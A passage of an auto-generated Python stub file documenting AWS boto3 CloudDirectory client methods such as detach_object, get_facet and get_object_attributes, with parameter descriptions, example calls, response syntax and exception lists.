:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe unique name of the typed link facet.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
:return: {}
:returns:
(dict) --
"""
pass
def detach_from_index(DirectoryArn=None, IndexReference=None, TargetReference=None):
"""
Detaches the specified object from the specified index.
See also: AWS API Documentation
Exceptions
:example: response = client.detach_from_index(
DirectoryArn='string',
IndexReference={
'Selector': 'string'
},
TargetReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory the index and object exist in.\n
:type IndexReference: dict
:param IndexReference: [REQUIRED]\nA reference to the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TargetReference: dict
:param TargetReference: [REQUIRED]\nA reference to the object being detached from the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'DetachedObjectIdentifier': 'string'
}
Response Structure
(dict) --
DetachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was detached from the index.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.ObjectAlreadyDetachedException
CloudDirectory.Client.exceptions.NotIndexException
:return: {
'DetachedObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.ObjectAlreadyDetachedException
CloudDirectory.Client.exceptions.NotIndexException
"""
pass
def detach_object(DirectoryArn=None, ParentReference=None, LinkName=None):
"""
Detaches a given object from the parent object. The object that is to be detached from the parent is specified by the link name.
See also: AWS API Documentation
Exceptions
:example: response = client.detach_object(
DirectoryArn='string',
ParentReference={
'Selector': 'string'
},
LinkName='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where objects reside. For more information, see arns .\n
:type ParentReference: dict
:param ParentReference: [REQUIRED]\nThe parent reference from which the object with the specified link name is detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type LinkName: string
:param LinkName: [REQUIRED]\nThe link name associated with the object that needs to be detached.\n
:rtype: dict
ReturnsResponse Syntax
{
'DetachedObjectIdentifier': 'string'
}
Response Structure
(dict) --
DetachedObjectIdentifier (string) --
The ObjectIdentifier that was detached from the object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotNodeException
:return: {
'DetachedObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotNodeException
"""
pass
def detach_policy(DirectoryArn=None, PolicyReference=None, ObjectReference=None):
"""
Detaches a policy from an object.
See also: AWS API Documentation
Exceptions
:example: response = client.detach_policy(
DirectoryArn='string',
PolicyReference={
'Selector': 'string'
},
ObjectReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .\n
:type PolicyReference: dict
:param PolicyReference: [REQUIRED]\nReference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object whose policy object will be detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotPolicyException
:return: {}
:returns:
(dict) --
"""
pass
def detach_typed_link(DirectoryArn=None, TypedLinkSpecifier=None):
"""
Detaches a typed link from a specified source and target object. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.detach_typed_link(
DirectoryArn='string',
TypedLinkSpecifier={
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to detach the typed link.\n
:type TypedLinkSpecifier: dict
:param TypedLinkSpecifier: [REQUIRED]\nUsed to accept a typed link specifier as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def disable_directory(DirectoryArn=None):
"""
Disables the specified directory. Disabled directories cannot be read or written to. Only enabled directories can be disabled. Disabled directories may be reenabled.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_directory(
DirectoryArn='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory to disable.\n
:rtype: dict
ReturnsResponse Syntax{
'DirectoryArn': 'string'
}
Response Structure
(dict) --
DirectoryArn (string) --The ARN of the directory that has been disabled.
Exceptions
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.DirectoryDeletedException
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.InvalidArnException
:return: {
'DirectoryArn': 'string'
}
"""
pass
def enable_directory(DirectoryArn=None):
"""
Enables the specified directory. Only disabled directories can be enabled. Once enabled, the directory can then be read and written to.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_directory(
DirectoryArn='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory to enable.\n
:rtype: dict
ReturnsResponse Syntax{
'DirectoryArn': 'string'
}
Response Structure
(dict) --
DirectoryArn (string) --The ARN of the enabled directory.
Exceptions
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.DirectoryDeletedException
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.InvalidArnException
:return: {
'DirectoryArn': 'string'
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_applied_schema_version(SchemaArn=None):
"""
Returns current applied schema version ARN, including the minor version in use.
See also: AWS API Documentation
Exceptions
:example: response = client.get_applied_schema_version(
SchemaArn='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe ARN of the applied schema.\n
:rtype: dict
ReturnsResponse Syntax{
'AppliedSchemaArn': 'string'
}
Response Structure
(dict) --
AppliedSchemaArn (string) --Current applied schema ARN, including the minor version in use if one was provided.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'AppliedSchemaArn': 'string'
}
"""
pass
def get_directory(DirectoryArn=None):
"""
Retrieves metadata about a directory.
See also: AWS API Documentation
Exceptions
:example: response = client.get_directory(
DirectoryArn='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory.\n
:rtype: dict
ReturnsResponse Syntax{
'Directory': {
'Name': 'string',
'DirectoryArn': 'string',
'State': 'ENABLED'|'DISABLED'|'DELETED',
'CreationDateTime': datetime(2015, 1, 1)
}
}
Response Structure
(dict) --
Directory (dict) --Metadata about the directory.
Name (string) --The name of the directory.
DirectoryArn (string) --The Amazon Resource Name (ARN) that is associated with the directory. For more information, see arns .
State (string) --The state of the directory. Can be either Enabled , Disabled , or Deleted .
CreationDateTime (datetime) --The date and time when the directory was created.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
:return: {
'Directory': {
'Name': 'string',
'DirectoryArn': 'string',
'State': 'ENABLED'|'DISABLED'|'DELETED',
'CreationDateTime': datetime(2015, 1, 1)
}
}
"""
pass
def get_facet(SchemaArn=None, Name=None):
"""
Gets details of the Facet , such as facet name, attributes, Rule s, or ObjectType . You can call this on all kinds of schema facets -- published, development, or applied.
See also: AWS API Documentation
Exceptions
:example: response = client.get_facet(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the facet to retrieve.\n
:rtype: dict
ReturnsResponse Syntax
{
'Facet': {
'Name': 'string',
'ObjectType': 'NODE'|'LEAF_NODE'|'POLICY'|'INDEX',
'FacetStyle': 'STATIC'|'DYNAMIC'
}
}
Response Structure
(dict) --
Facet (dict) --
The Facet structure that is associated with the facet.
Name (string) --
The name of the Facet .
ObjectType (string) --
The object type that is associated with the facet. See CreateFacetRequest$ObjectType for more details.
FacetStyle (string) --
There are two different styles that you can define on any given facet, Static and Dynamic . For static facets, all attributes must be defined in the schema. For dynamic facets, attributes can be defined during data plane operations.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
:return: {
'Facet': {
'Name': 'string',
'ObjectType': 'NODE'|'LEAF_NODE'|'POLICY'|'INDEX',
'FacetStyle': 'STATIC'|'DYNAMIC'
}
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
"""
pass
def get_link_attributes(DirectoryArn=None, TypedLinkSpecifier=None, AttributeNames=None, ConsistencyLevel=None):
"""
Retrieves attributes that are associated with a typed link.
See also: AWS API Documentation
Exceptions
:example: response = client.get_link_attributes(
DirectoryArn='string',
TypedLinkSpecifier={
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
AttributeNames=[
'string',
],
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the typed link resides. For more information, see arns or Typed Links .\n
:type TypedLinkSpecifier: dict
:param TypedLinkSpecifier: [REQUIRED]\nAllows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type AttributeNames: list
:param AttributeNames: [REQUIRED]\nA list of attribute names whose values will be retrieved.\n\n(string) --\n\n
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level at which to retrieve the attributes on a typed link.
:rtype: dict
ReturnsResponse Syntax
{
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
Response Structure
(dict) --
Attributes (list) --
The attributes that are associated with the typed link.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def get_object_attributes(DirectoryArn=None, ObjectReference=None, ConsistencyLevel=None, SchemaFacet=None, AttributeNames=None):
"""
Retrieves attributes within a facet that are associated with an object.
See also: AWS API Documentation
Exceptions
:example: response = client.get_object_attributes(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL',
SchemaFacet={
'SchemaArn': 'string',
'FacetName': 'string'
},
AttributeNames=[
'string',
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object whose attributes will be retrieved.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level at which to retrieve the attributes on an object.
:type SchemaFacet: dict
:param SchemaFacet: [REQUIRED]\nIdentifier for the facet whose attributes will be retrieved. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n
:type AttributeNames: list
:param AttributeNames: [REQUIRED]\nList of attribute names whose values will be retrieved.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
Response Structure
(dict) --
Attributes (list) --
The attributes that are associated with the object.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def get_object_information(DirectoryArn=None, ObjectReference=None, ConsistencyLevel=None):
"""
Retrieves metadata about an object.
See also: AWS API Documentation
Exceptions
:example: response = client.get_object_information(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory being retrieved.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nA reference to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level at which to retrieve the object information.
:rtype: dict
ReturnsResponse Syntax
{
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
}
Response Structure
(dict) --
SchemaFacets (list) --
The facets attached to the specified object. Although the response does not include minor version information, the most recently applied minor version of each Facet is in effect. See GetAppliedSchemaVersion for details.
(dict) --
A facet.
SchemaArn (string) --
The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.
FacetName (string) --
The name of the facet.
ObjectIdentifier (string) --
The ObjectIdentifier of the specified object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
